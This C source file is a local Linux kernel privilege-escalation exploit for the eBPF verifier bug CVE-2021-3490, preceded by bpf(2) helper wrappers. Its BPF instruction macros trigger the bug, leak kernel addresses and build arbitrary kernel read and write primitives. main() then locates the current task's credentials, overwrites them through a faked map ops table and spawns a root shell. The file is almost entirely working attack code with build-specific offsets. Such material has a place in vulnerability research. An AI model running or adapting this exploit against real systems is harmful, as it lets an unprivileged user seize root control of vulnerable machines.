void *owner, uint32_t size);
void (*map_local_storage_uncharge)(struct bpf_local_storage_map *smap,
void *owner, uint32_t size);
struct bpf_local_storage __rcu ** (*map_owner_storage_ptr)(void *owner);

/* map_meta_equal must be implemented for maps that can be
* used as an inner map. It is a runtime check to ensure
* an inner map can be inserted to an outer map.
*
* Some properties of the inner map has been used during the
* verification time. When inserting an inner map at the runtime,
* map_meta_equal has to ensure the inserting map has the same
* properties that the verifier has used earlier.
*/
int (*map_meta_equal)(const struct bpf_map *meta0,
const struct bpf_map *meta1);

/* BTF name and id of struct allocated by map_alloc */
const char * const map_btf_name;
int *map_btf_id;

/* bpf_iter info used to open a seq_file */
const struct bpf_iter_seq_info *iter_seq_info;
};

/*
 * Thin wrapper around the bpf(2) system call.
 *
 * cmd is a BPF_* command, attr its argument block; the size passed to the
 * kernel is always sizeof(union bpf_attr). Returns whatever syscall()
 * returns, narrowed to int.
 */
static __always_inline int bpf(int cmd, union bpf_attr *attr)
{
    long rc;

    rc = syscall(__NR_bpf, cmd, attr, sizeof(union bpf_attr));

    return (int) rc;
}

/*
 * Load an eBPF program with BPF_PROG_LOAD (license string "GPL").
 *
 * prog_type   BPF_PROG_TYPE_* value
 * insns       instruction array
 * insn_cnt    number of instructions (narrowed to the 32-bit attr field)
 * log_buf     buffer receiving the verifier log, log_buf_sz bytes long
 * log_level   verifier log level
 *
 * Returns the value of the bpf() call: a program fd on success, negative on
 * failure.
 */
static __always_inline int
bpf_load_prog(unsigned int prog_type, struct bpf_insn *insns, uint64_t insn_cnt,
              char *log_buf, unsigned int log_buf_sz, unsigned int log_level)
{
    union bpf_attr attr;

    /*
     * Zero the WHOLE union before filling it in. A designated initializer
     * only guarantees the initialised member is set; bytes of the union
     * outside that member may be left indeterminate by the compiler, and the
     * kernel rejects attrs whose unused bytes are not zero.
     */
    memset(&attr, 0, sizeof(attr));
    attr.prog_type = prog_type;
    attr.insns = (uint64_t) (uintptr_t) insns;
    attr.insn_cnt = (uint32_t) insn_cnt;
    attr.license = (uint64_t) (uintptr_t) "GPL";
    attr.log_level = log_level;
    attr.log_buf = (uint64_t) (uintptr_t) log_buf;
    attr.log_size = log_buf_sz;

    return bpf(BPF_PROG_LOAD, &attr);
}

/*
 * Create an eBPF map with BPF_MAP_CREATE.
 *
 * map_type     BPF_MAP_TYPE_* value
 * key_size     size of a key in bytes
 * value_size   size of a value in bytes
 * max_entries  capacity of the map
 *
 * Returns the value of the bpf() call: a map fd on success, negative on
 * failure.
 */
static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
               unsigned int value_size, unsigned int max_entries)
{
    union bpf_attr attr;

    /*
     * Clear every byte of the union first: the map-create member is smaller
     * than the union, a designated initializer does not guarantee the
     * remaining bytes are zero, and the kernel rejects non-zero unused bytes.
     */
    memset(&attr, 0, sizeof(attr));
    attr.map_type = map_type;
    attr.key_size = key_size;
    attr.value_size = value_size;
    attr.max_entries = max_entries;

    return bpf(BPF_MAP_CREATE, &attr);
}

/*
 * Copy the value stored under *key in map_fd into *value
 * (BPF_MAP_LOOKUP_ELEM). The caller's value buffer must be at least as large
 * as the map's value size. Returns the value of the bpf() call.
 */
static __always_inline int
bpf_map_lookup_elem(int map_fd, const void *key, void *value)
{
    union bpf_attr attr;

    /* zero the full union; unused attr bytes must be 0 for the kernel */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key = (uint64_t) (uintptr_t) key;
    attr.value = (uint64_t) (uintptr_t) value;

    return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

/*
 * Store *value under *key in map_fd (BPF_MAP_UPDATE_ELEM) with the given
 * flags word. The value buffer must be at least as large as the map's value
 * size. Returns the value of the bpf() call.
 */
static __always_inline int
bpf_map_update_elem(int map_fd,const void *key,const void *value,uint64_t flags)
{
    union bpf_attr attr;

    /* zero the full union; unused attr bytes must be 0 for the kernel */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key = (uint64_t) (uintptr_t) key;
    attr.value = (uint64_t) (uintptr_t) value;
    attr.flags = flags;

    return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

/*
 * Delete the element stored under *key from map_fd (BPF_MAP_DELETE_ELEM).
 * Returns the value of the bpf() call.
 */
static __always_inline int
bpf_map_delete_elem(int map_fd, const void *key)
{
    union bpf_attr attr;

    /* zero the full union; unused attr bytes must be 0 for the kernel */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key = (uint64_t) (uintptr_t) key;

    return bpf(BPF_MAP_DELETE_ELEM, &attr);
}

/*
 * Fetch the key that follows *key in map_fd (BPF_MAP_GET_NEXT_KEY).
 *
 * NOTE: despite its name, the third parameter receives the NEXT KEY, not a
 * value; it is passed to the kernel as attr.next_key.
 * Returns the value of the bpf() call.
 */
static __always_inline int
bpf_map_get_next_key(int map_fd, const void *key, void *value)
{
    union bpf_attr attr;

    /* zero the full union; unused attr bytes must be 0 for the kernel */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key = (uint64_t) (uintptr_t) key;
    attr.next_key = (uint64_t) (uintptr_t) value;

    return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}

#define BPF_LOG_BUF_SZ 0x100000
static char bpf_log_buf[BPF_LOG_BUF_SZ] = { '\0' };

/**
 * @brief Run a bpf prog by attaching to a pair of sockets and sending packets
 *
 * The program is loaded as a BPF_PROG_TYPE_SOCKET_FILTER, attached to one end
 * of an AF_UNIX datagram socket pair, and triggered by writing one 8-byte
 * packet to the other end. The verifier log is collected in bpf_log_buf; it
 * is printed when print_log is non-zero, and always when loading, attaching
 * or triggering fails.
 *
 * @param insns bpf program to be run
 * @param insn_cnt number of bpf instructions
 * @param log_level verifier log level handed to BPF_PROG_LOAD
 * @param print_log non-zero to print the verifier log after a successful run
 * @return int 0 for success, a negative value for failure
 */
static int
run_bpf_prog(struct bpf_insn *insns, uint64_t insn_cnt, unsigned int log_level,
             unsigned int print_log)
{
    char *err_msg = NULL;
    int sock_fd[2], prog_fd;
    int ret;

    /* socket pair to trigger eBPF prog */
    ret = socketpair(AF_UNIX, SOCK_DGRAM, 0, sock_fd);
    if (ret < 0) {
        err_msg = "FAILED to creat socket pair!";
        goto err_socket;
    }

    /* start from an empty log so a stale one is never printed */
    memset(bpf_log_buf, 0, sizeof(bpf_log_buf));

    /* load bpf prog into kernel */
    prog_fd = bpf_load_prog(BPF_PROG_TYPE_SOCKET_FILTER, insns, insn_cnt,
                            bpf_log_buf, BPF_LOG_BUF_SZ, log_level);
    if (prog_fd < 0) {
        ret = prog_fd;
        err_msg = "FAILED to load bpf program!";
        goto err_bpf_load;
    }

    /* attach bpf prog to a socket */
    ret = setsockopt(sock_fd[0], SOL_SOCKET, SO_ATTACH_BPF,
                     &prog_fd, sizeof(int));
    if (ret < 0) {
        err_msg = "FAILED to attach the bpf program!";
        goto err_bpf_attach;
    }

    /*
     * Send a packet to trigger bpf. If the packet cannot be sent the program
     * never ran, so report that instead of claiming success.
     */
    if (write(sock_fd[1], "11111111", 8) < 0) {
        ret = -1;
        err_msg = "FAILED to send the trigger packet!";
        goto err_bpf_attach;
    }

    /* output the log */
    if (print_log != 0) {
        puts(bpf_log_buf);
    }

    /* recycle resource */
    close(prog_fd);
    close(sock_fd[1]);
    close(sock_fd[0]);

    return 0;

err_bpf_attach:
    close(prog_fd);
err_bpf_load:
    puts(bpf_log_buf);
    close(sock_fd[1]);
    close(sock_fd[0]);
err_socket:
    err_print(err_msg);
    return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"
#include "bpf_tools.h"

#define MAP_SIZE 0x2000

#define ARRAY_MAP_OPS 0xffffffff822363e0
#define ARRAY_MAP_GET_NEXT_KEY 0xffffffff81239c80
#define INIT_TASK 0xffffffff82e1b400
#define INIT_CRED 0xffffffff82e88f20

#define VULN_REG BPF_REG_6
/*
 * Look up element __idx of the array map __map_fd and leave the element
 * pointer in __dst_reg (the program exits if the lookup returns 0; r0 is
 * reset to 0 afterwards). Writes r0, r1, r2, r9 and the stack slot r10 - 8.
 *
 * NOTE(review): this repeats, token for token, the definition in the helper
 * header listing earlier in this document (presumably bpf_tools.h, which is
 * included above). The two replacement lists must stay identical or the
 * compiler will reject the redefinition.
 */
#define BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, __dst_reg) \
/* get a pointer to bpf_array */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, __idx), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* mov the result back and clear R0 */ \
BPF_MOV64_REG(__dst_reg, BPF_REG_0), \
BPF_MOV64_IMM(BPF_REG_0, 0)

/*
 * First stage of every program in this file; prepares VULN_REG.
 *
 *   1. r8 = pointer to map element 0, VULN_REG = the 64-bit value stored
 *      there (only known at run time).
 *   2. r4 = MOV64_IMM 0xffffffff shifted left by 32; VULN_REG &= r4 clears the
 *      low 32 bits of VULN_REG, then 1 is added.
 *   3. r3 = (1 << 32) + 2 = 0x100000002; VULN_REG &= r3.
 *
 * Per the accompanying write-up, the 64-bit AND in step 3 is the operation
 * for which the verifier fails to update the 32-bit bounds (CVE-2021-3490).
 * Besides VULN_REG this uses r0-r4, r8, r9 and the stack slot at r10 - 8.
 */
#define TRIGGER_VULN(__map_fd) \
/* load value into VULN_REG, make it part-unknown */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, VULN_REG, BPF_REG_8, 0), \
BPF_MOV64_IMM(BPF_REG_4, 0xffffffff), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_4, 32), \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_4), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
/* r3 = 0x100000002 */ \
BPF_MOV64_IMM(BPF_REG_3, 0x1), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_3, 32), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 0x2), \
/* trigger the vulnerability */ \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_3)

/*
 * Second stage; must follow TRIGGER_VULN because it reads VULN_REG.
 *
 * r7 = 64-bit value of map element 0. Unless the low 32 bits of r7 are <= 1
 * (JMP32 with BPF_JLE) the program exits with r0 = 0. Otherwise
 * VULN_REG = (VULN_REG + r7 + 1) & 1, and r0 is set to 0.
 */
#define MAKE_VULN_REG(__map_fd) \
/* load value into r7, make it [0, 1] under 32 bit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), \
BPF_JMP32_IMM(BPF_JLE, BPF_REG_7, 1, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU64_REG(BPF_ADD, VULN_REG, BPF_REG_7), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
BPF_ALU64_IMM(BPF_AND, VULN_REG, 0x1), \
BPF_MOV64_IMM(BPF_REG_0, 0)

/*
 * Read one 64-bit word relative to map element 0 and store it in element 1.
 *
 * With V = VULN_REG on entry, the load address is
 *     &element0 + 0x1000 - 0x1000 * V - 0x110 * V
 * and the loaded word is written to the start of element 1, where userspace
 * fetches it with a map lookup. 0x110 is the same constant main() uses as the
 * distance between the map base and its value area.
 * Modifies r7, r8 and VULN_REG (plus the registers used by the lookups).
 */
#define LEAK_MAP_OPS(__map_fd) \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x110), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), \
BPF_READ_ARRAY_MAP_IDX(1, __map_fd, BPF_REG_7), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0)

/*
 * Store the pointer value (&element0 + VULN_REG) into map element 1.
 *
 * VULN_REG is first passed through a 32-bit register move onto itself, then
 * added to the element-0 pointer in r7; r7 itself (the pointer, not what it
 * points to) is written as a 64-bit word to element 1.
 * Used directly after TRIGGER_VULN, without MAKE_VULN_REG, in main().
 */
#define LEAK_MAP_ADDR(__map_fd) \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV32_REG(VULN_REG, VULN_REG), \
BPF_ALU64_REG(BPF_ADD, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(1, __map_fd, BPF_REG_8), \
BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0)

/*
 * Write (value of map element __idx) - 0x58 as a 64-bit word to
 *     &element0 + 0x1000 - 0x1000 * V - 0xd0 * V        (V = VULN_REG on entry)
 *
 * The existing comment identifies the destination as bpf_map->btf; the
 * companion C function then retrieves data through the map-info btf_id field.
 * NOTE(review): 0xd0 and 0x58 are hard-coded structure offsets for the target
 * kernel build -- confirm before reusing elsewhere.
 * Modifies r1, r7, r8 and VULN_REG (plus the registers used by the lookups).
 */
#define READ_ARBITRARY_ADDR(__map_fd, __idx) \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xd0), \
/* write the value into bpf_map->btf */ \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_8, 0), \
BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 0x58), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_1, 0)

/*
 * Perform four stores at decreasing addresses below map element 0.
 *
 * r7 starts at &element0 + 0x1000 - 0x1000 * V and r8 keeps a copy of
 * V = VULN_REG. Each step reloads VULN_REG from r8, multiplies it by a step
 * size and subtracts it from r7, so the offsets ACCUMULATE:
 *     step 0xE4 -> 32-bit store of 0x2000
 *     step 0x08 -> 32-bit store of 0xffffffff
 *     step 0x0C -> 32-bit store of 23
 *     step 0x18 -> 64-bit store of the value held in map element 2
 * The inline comments name the fields the author intends to hit.
 * NOTE(review): the step sizes are hard-coded structure offsets for the
 * target kernel build -- confirm before reusing elsewhere.
 */
#define MAKE_ARBITRARY_WRITE_OPS(__map_fd) \
/* extend the alu_limit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
/* overwrite spin_lock_off */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xE4), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0x2000), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite max_entries */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x8), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0xffffffff), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite map_type */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xC), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 23), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite the map->ops */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x18), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(2, __map_fd, BPF_REG_4), \
BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_4, 0), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_5, 0)

size_t fake_ops_addr;
size_t map_addr;
size_t map_ops_addr;
size_t current_task;
size_t current_cred;

/*
 * Run the TRIGGER_VULN + MAKE_VULN_REG + READ_ARBITRARY_ADDR program for map
 * element idx, then query the map with BPF_OBJ_GET_INFO_BY_FD and return the
 * btf_id field of the returned info.
 *
 * The caller must have stored the address of interest in map element idx
 * beforehand. Returns 0 both when a step fails and when the value read is 0;
 * the two cases cannot be told apart by the caller.
 */
static size_t read_arbitrary_addr_4_bytes(int map_fd, int idx){
size_t data;
int ret;
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
READ_ARBITRARY_ADDR(map_fd, idx),
BPF_EXIT_INSN()};

/* log level 1, but do not print the verifier log on success */
ret = run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
if (ret < 0){
return 0;
}

struct bpf_map_info info;
union bpf_attr attr = {
.info.bpf_fd = map_fd,
.info.info_len = sizeof(info),
.info.info = (uint64_t)&info,
};

memset(&info, 0, sizeof(info));
ret = bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
if (ret < 0){
return 0;
}
/* btf_id is the channel through which the word comes back to userspace */
data = info.btf_id;
return data;
}

/*
 * Read a 64-bit word from addr by combining two 32-bit reads.
 *
 * addr is stored in map element 1 and addr + 4 in element 2; the word at
 * element 2 becomes the high half of the result and the word at element 1
 * the low half. Calls err_exit() (declared outside this listing) when a map
 * update fails.
 *
 * Only value[0] is assigned before each update; the remaining bytes that the
 * kernel copies from the buffer are uninitialised stack contents.
 */
size_t read_arbitrary_addr(int map_fd, size_t addr)
{
size_t data;
int key;
size_t value[0x1000];

key = 1;
value[0] = addr;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
key = 2;
value[0] = addr + 4;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
/* high 32 bits first, then shift and add the low 32 bits */
data = read_arbitrary_addr_4_bytes(map_fd, 2);
data <<= 32;
data += read_arbitrary_addr_4_bytes(map_fd, 1);
return data;
}

/*
 * Build a modified copy of the map's operations table inside the map and run
 * the MAKE_ARBITRARY_WRITE_OPS program.
 *
 * Steps, in order:
 *   - fake_ops_addr is set to map_addr + 0x110 + MAP_SIZE;
 *   - sizeof(struct bpf_map_ops) bytes are read from map_ops_addr, 8 at a
 *     time, into value[];
 *   - the map_push_elem slot of that copy is replaced with
 *     ARRAY_MAP_GET_NEXT_KEY + kernel_offset;
 *   - the copy is stored in map element 1 and fake_ops_addr in element 2;
 *   - the BPF program is run; its return value is not checked.
 *
 * Relies on the globals map_addr and map_ops_addr being set by the caller,
 * and on kernel_offset / err_exit(), which are declared outside this listing
 * (presumably in kernelpwn.h).
 * NOTE(review): the err_exit() messages say "look up" although the failing
 * call is a map update.
 */
void make_arbitrary_write_ops(int map_fd){
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
MAKE_ARBITRARY_WRITE_OPS(map_fd),
BPF_EXIT_INSN()};
int key;
size_t per_ops_ptr, value[0x1000], value_idx;
struct bpf_map_ops *ops_data;

fake_ops_addr = map_addr + 0x110 + MAP_SIZE; /* save fake ops addr into map */

value_idx = 0; /* read ops */
for (size_t i = 0; i < sizeof(struct bpf_map_ops); i += 8){
per_ops_ptr = read_arbitrary_addr(map_fd, map_ops_addr + i);
value[value_idx++] = per_ops_ptr;
}

ops_data = (struct bpf_map_ops *)value; /* load ops */
ops_data->map_push_elem = (void *)(ARRAY_MAP_GET_NEXT_KEY + kernel_offset);
key = 1;
if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
err_exit("FAILED to look up value!");
}

key = 2;
value[0] = fake_ops_addr;
if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
err_exit("FAILED to look up value!");
}

run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
}

/**
 * Hex-dump a buffer to stdout, eight bytes per row.
 *
 * Each row shows the byte offset, the eight bytes in memory order, and the
 * same eight bytes interpreted as one native-endian 64-bit word.
 *
 * @param p    start of the buffer to dump
 * @param size number of bytes to dump; must be a multiple of 8
 * @return 0 after dumping; 1 (nothing printed) if size is not a multiple of
 *         8 or if p is NULL while size is positive
 */
int print_hex(void *p, int size){
    /* A row is always 8 bytes: the format string below consumes buf[i..i+7]. */
    enum { ROW_BYTES = 8 };
    const unsigned char *buf = p;

    if (size % ROW_BYTES){
        return 1;
    }
    if (buf == NULL && size > 0){
        return 1;
    }

    printf("--------------------------------------------------------------------------------\n");
    for (int i = 0; i < size; i += ROW_BYTES){
        unsigned long long word = 0;

        /* memcpy instead of a pointer cast: no alignment or aliasing assumptions */
        memcpy(&word, buf + i, ROW_BYTES);
        printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%llx\n",
               (unsigned int) i, buf[i+0], buf[i+1], buf[i+2], buf[i+3],
               buf[i+4], buf[i+5], buf[i+6], buf[i+7], word);
    }
    return 0;
}

/*
 * Entry point of the proof-of-concept. The steps run strictly in order; each
 * one depends on values produced by the previous one.
 *
 * err_exit(), get_root_shell(), kernel_offset, kernel_base and init_cred are
 * not declared in this listing -- presumably they come from kernelpwn.h.
 * NOTE(review): 0x110, 0x818, 0x2d0 and 0xad8 are hard-coded structure
 * offsets and the upper-case address macros are hard-coded symbols; all of
 * them are specific to one kernel build.
 * argc, argv, envp and log_fd are unused.
 */
int main(int argc , char **argv, char **envp)
{
int map_fd;
int key;
size_t value[0x1000];
int log_fd;

/* array map: 4-byte keys, MAP_SIZE-byte values, 0x100 entries */
map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, MAP_SIZE, 0x100);
if (map_fd < 0) {
err_exit("FAILED to create eBPF map!");
}

/* element 0 is the run-time input the BPF programs load; its first word is 0 */
key = 0;
value[0] = 0;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0) {
err_exit("FAILED to load value into map!");
}

/* step 1: the program leaves one leaked 64-bit word in element 1 */
puts("leak map_ops_addr");
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
LEAK_MAP_OPS(map_fd),
BPF_EXIT_INSN()
};
if(run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 1) < 0){
err_exit("FAILED to run bpf prog!");
};

key = 1;
if (bpf_map_lookup_elem(map_fd, &key, &value) < 0){
err_exit("FAILED to look up value!");
}
print_hex(value,0x10);
map_ops_addr = value[0];
printf("map_ops_addr: 0x%lx\n", map_ops_addr);

/* derive the load offset from the leaked pointer and the static symbol address */
kernel_offset = map_ops_addr - ARRAY_MAP_OPS;
kernel_base += kernel_offset;
init_cred = INIT_CRED + kernel_offset;
printf("map_ops_addr: 0x%lx\n", map_ops_addr);
printf("kernel_base: 0x%lx\n", kernel_base);
printf("kernel_offset: 0x%lx\n", kernel_offset);

/* step 2: the program stores a pointer into the map's value area in element 1 */
puts("leak map_addr");
struct bpf_insn prog2[] = {
TRIGGER_VULN(map_fd),
LEAK_MAP_ADDR(map_fd),
BPF_EXIT_INSN()
};
if(run_bpf_prog(prog2, sizeof(prog2) / sizeof(prog2[0]), 1, 1) < 0){
err_exit("FAILED to run bpf prog!");
};

key = 1;
if (bpf_map_lookup_elem(map_fd, &key, &value) < 0){
err_exit("FAILED to look up value!");
}
print_hex(value,0x10);
/* 0x110: distance from the map base to its value area */
map_addr = value[0] - 0x110;
printf("map_addr: 0x%lx\n", map_addr);

/*
 * step 3: walk a linked list starting at INIT_TASK + 0x818 until the 8 bytes
 * at +0x2d0 from the list node equal the name set with prctl() below.
 */
size_t next_task = INIT_TASK + kernel_offset + 0x818;
size_t data;

prctl(PR_SET_NAME, "11111111");
do{
next_task = read_arbitrary_addr(map_fd, next_task);
data = read_arbitrary_addr(map_fd, next_task + 0x2d0);
} while (data != *(size_t *)"11111111");

current_task = next_task - 0x818;
current_cred = read_arbitrary_addr(map_fd, current_task + 0xad8);
printf("current_task: 0x%lx\n", current_task);
printf("current_cred: 0x%lx\n", current_cred);

/* step 4: patch the map so that later update calls reach the replaced slot */
make_arbitrary_write_ops(map_fd);

/*
 * step 5: eight update calls; the flags argument carries
 * current_cred + 4 + 4 * i and the value's first word is -1.
 */
key = 0;
value[0] = -1;
for (int i = 0; i < 8; i++){
if (bpf_map_update_elem(map_fd, &key, &value[0], current_cred + 4 + 4 * i) < 0){
printf("\033[31m\033[1m[x] Failed to ovwerwrite no.%d\033[0m\n", i);
err_exit("FAILED to call ops->map_push_elem()!");
}
}
get_root_shell();

return 0;
}